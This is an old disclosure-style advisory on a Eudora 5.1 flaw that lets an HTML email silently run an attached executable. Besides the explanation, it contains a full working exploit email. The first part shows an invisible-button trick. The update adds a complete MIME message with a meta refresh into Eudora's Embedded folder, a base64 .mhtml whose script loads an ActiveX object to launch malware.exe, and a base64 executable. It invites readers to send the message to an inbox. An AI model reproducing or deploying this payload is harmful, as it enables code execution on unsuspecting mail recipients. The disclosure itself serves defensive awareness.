COMMAND

	Eudora may be fooled to execute e-mail attached executable
	

	

SYSTEMS AFFECTED

	Eudora 5.1

PROBLEM

	    'http-equiv' found  following.   Silent delivery  and installation

	    of an executable on a  target computer.  This can  be accomplished

	    with the default installation of the mail client Eudora 5.1:

	
	        - 'allow executables in HTML content' DISABLED

	        - 'use Microsoft viewer' ENABLED

	

	    The  manufacturer  done  a  tremendous  job  of  shutting down all

	    possibilities of  scripting and  all other  necessaries to achieve

	    the following  result.   However there  still remains  a number of

	    good possibilities.   One of which  is the following  that we find

	    to be quite interesting.

	

	    Using the POWAH! of Internet Explorer, we create yet another  HTML

	    mail message as follows:

	
	        <FORM action="cid:master.malware.com" method=post target=new><button type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><u>http://www.malware.com</u></button> </FORM>

	        <img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1>

	

	    Where  our  first  image  is  our  executable.   Our  second image

	    comprises  a  simple  JavaScripting  and  ActiveX  control.   What

	    happens is, once the mail message is opened in Eudora 5.1, the two

	    'embedded' images  are silently  and instantly  transferred to the

	    'Embedded' folder.

	

	    What we then do is create a simple html form and button.  Owing to

	    the POWAH! of Internet Explorer, we are able to create this button

	    with  a  transparent  background.   In  addition,  we  are able to

	    dispose of  the border  of this  button, which  combined with  the

	    transparent background gives us nothing.  That is, we have a fully

	    functional form and button but we are not able to see it.  We then

	    create a fake link and incorporate that into our invisible button.

	    We then embed  our simple JavaScripting  and ActiveX control  into

	    our invisible button and fire it off to our target computer:

	
	        - before click (screen shot: http://www.malware.com/heydora.jpg 62KB)

	        - after click  (screen shot: http://www.malware.com/hey!dora.jpg 62KB)

	

	    The recipient is  then lulled into  clicking on the  "link".  What

	    that  does   is  pull   our  html   file  comprising   our  simple

	    JavaScripting and ActiveX control  out of the embedded  folder and

	    into a new Internet Explorer Window.

	

	    Because our *.exe and our simple JavaScripting and ActiveX control

	    reside in the same  folder [the so-called "Embedded'  folder], and

	    because it is  automatically opened in  our new Internet  Explorer

	    Window, everything is instant.

	

	    No warnings.  No nothing.  The *.exe is executed instantly.

	

	    Working Example.  Harmless *.exe. incorporated.  Tested on  win98,

	    with  IE5.5  (all  of  its  patches  and so-called service packs),

	    default Eudora 5.1 with 'use Microsoft viewer'  ENABLED and 'allow

	    executables in HTML content' DISABLED.

	

	    The following is in  plaintext.  We are  unable to figure out  how

	    to import  a single  message into  Eudora's inbox.   Perhaps  some

	    bright spark knows.   Otherwise, incorporate the text  sample into

	    a telnet session or other and fire off to your Eudora inbox:

	
	        http://www.malware.com/hey!DORA.txt

	

	

	

	 Update (25 July 2002)

	 ======

	

	http-equiv udpates the status of  this  advisory  in  regards  with  the
	latest patch provided for Eudora :
	

	--snipp--
	

	The problem is that the manufacturer left out an important file type  to
	consider: the *.mhtml file. This is  automatically  opened  by  Internet
	Explorer via the meta refresh without any warning  whatsoever  i.e.  the
	same warning given to *.html.
	

	So What: all we have to do is embedded in our mail message [again!]  two
	files:
	

	i) malware.mhtml which contains our active x control

	ii) malware.exe which is our friendly executable

	

	In the mail  message  we  reference  our  malware.mhtml  with  the  meta
	refresh tag and point it to our known location  on  default  install  of
	Eudora on win98.
	

	So once [again!] someone receives the mail message. Both files  embedded
	are silently and instantly transferred to the embedded folder. The  meta
	refresh then springs open the *.mhtml file inside  the  embedded  folder
	without warning, in our conveniently opened new browser window  courtesy
	of the meta refresh and bang ! it  runs  the  *.exe  via  the  active  x
	control.
	

	 Working Example

	 ===============

	

	Harmless *.exe. incorporated. Tested on win98, with IE6.00 (all  of  its
	patches and so-called service packs), default Eudora 5.1.1 with:
	 

	'use Microsoft viewer'  ENABLED 

	'allow executables in HTML content' DISABLED. 

	

	The following is in plaintext. We  are  unable  to  figure  out  how  to
	import a single message into Eudora's inbox. Perhaps some  bright  spark
	knows. Otherwise, incorporate the text sample into a telnet  session  or
	other and  fire off to your Eudora inbox,
	

	See http://www.malware.com/boodora.txt :
	 

	MIME-Version: 1.0

	Content-Type: multipart/related;

	 boundary="------------49C1C22C537D4A1164278569"

	

	

	--------------49C1C22C537D4A1164278569

	Content-Type: text/html; charset=us-ascii

	Content-Transfer-Encoding: 7bit

	

	<!doctype html public "-//w3c//dtd html 4.0 transitional//en">

	<html>

	<META http-equiv=refresh content="1; &#13;&#10;url=file://C:\WINDOWS\Application Data\Qualcomm\Eudora\Embedded\malware.mhtml">

	<!-- 21,07.02 http://www.malware.com -->

	<img SRC="cid:mal.ware" style="display:none">

	<img SRC="cid:malware" style="display:none">

	</html>

	

	--------------49C1C22C537D4A1164278569

	Content-Type: application/octet-stream

	Content-ID: <mal.ware>

	Content-Transfer-Encoding: base64

	Content-Disposition: inline; filename="malware.mhtml"

	

	TUlNRS1WZXJzaW9uOiAxLjANCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2FsdGVybmF0aXZl

	Ow0KCWJvdW5kYXJ5PSItLS0tPV9OZXh0UGFydF8wMDBfMDFGOF8wMUMyMzBCNy4yMTk0MjJF

	MCINClgtU291cmNlOiBodHRwOi8vd3d3Lm1hbHdhcmUuY29tIC0gMjEuMDcuMDINCg0KDQpU

	aGlzIGlzIGEgbXVsdGktcGFydCBtZXNzYWdlIGluIE1JTUUgZm9ybWF0Lg0KDQotLS0tLS09

	X05leHRQYXJ0XzAwMF8wMUY4XzAxQzIzMEI3LjIxOTQyMkUwDQpDb250ZW50LVR5cGU6IHRl

	eHQvcGxhaW47DQoJY2hhcnNldD0iV2luZG93cy0xMjUyIg0KQ29udGVudC1UcmFuc2Zlci1F

	bmNvZGluZzogN2JpdA0KDQptYWx3YXJlLmNvbQ0KDQotLS0tLS09X05leHRQYXJ0XzAwMF8w

	MUY4XzAxQzIzMEI3LjIxOTQyMkUwDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDsNCgljaGFy

	c2V0PSJXaW5kb3dzLTEyNTIiDQpDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA3Yml0DQoN

	CiA8c2NyaXB0Pg0KLy8gaHR0cDovL3d3dy5tYWx3YXJlLmNvbSAtIERlY2VtYmVyIDIwMDAN

	CmRvY3VtZW50LndyaXRlbG4oJzxJRlJBTUUgSUQ9cnVubmVyd2luIFdJRFRIPTAgSEVJR0hU

	PTAgU1JDPSJhYm91dDpibGFuayI+PC9JRlJBTUU+Jyk7DQpmdW5jdGlvbiBsaW5raXQoZmls

	ZW5hbWUpDQp7DQogICBzdHJwYWdlc3RhcnQgPSAiPEhUTUw+PEhFQUQ+PC9IRUFEPjxCT0RZ

	PjxPQkpFQ1QgICBDTEFTU0lEPSIgKw0KICAgICAgIidDTFNJRDoxNTU4OUZBMS1DNDU2LTEx

	Q0UtQkYwMS0wMEFBMDA1NTU5NUEnIENPREVCQVNFPSciOw0KICAgc3RycGFnZWVuZCA9ICIn

	PjwvT0JKRUNUPjwvQk9EWT48L0hUTUw+IjsNCiAgIHJ1bm5lcndpbi5kb2N1bWVudC5vcGVu

	KCk7DQogICBydW5uZXJ3aW4uZG9jdW1lbnQud3JpdGUoc3RycGFnZXN0YXJ0ICsgZmlsZW5h

	bWUgKyBzdHJwYWdlZW5kKTsNCiB9DQpsaW5raXQoJ21hbHdhcmUuZXhlJyk7DQo8L3Njcmlw

	dD4NCg0KLS0tLS0tPV9OZXh0UGFydF8wMDBfMDFGOF8wMUMyMzBCNy4yMTk0MjJFMC0tDQo=

	--------------49C1C22C537D4A1164278569

	Content-Type: application/octet-stream

	Content-ID: <malware>

	Content-Transfer-Encoding: base64

	Content-Disposition: inline; filename="malware.exe"

	

	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

	AAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAfAAAgAAAhAAAi

	AAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAyAAAzAAA0

	AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/BAA/

	BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/

	FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/

	KQA/KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/

	OwA/PAA/PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/

	Pww/Pw0/Pw4/Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/

	Px4/Px8/PyA/PyE/PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/

	PzA/PzE/PzI/PzM/PzQ/PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=

	--------------49C1C22C537D4A1164278569--

	

	Notes: disable 'use Microsoft viewer'

SOLUTION

	?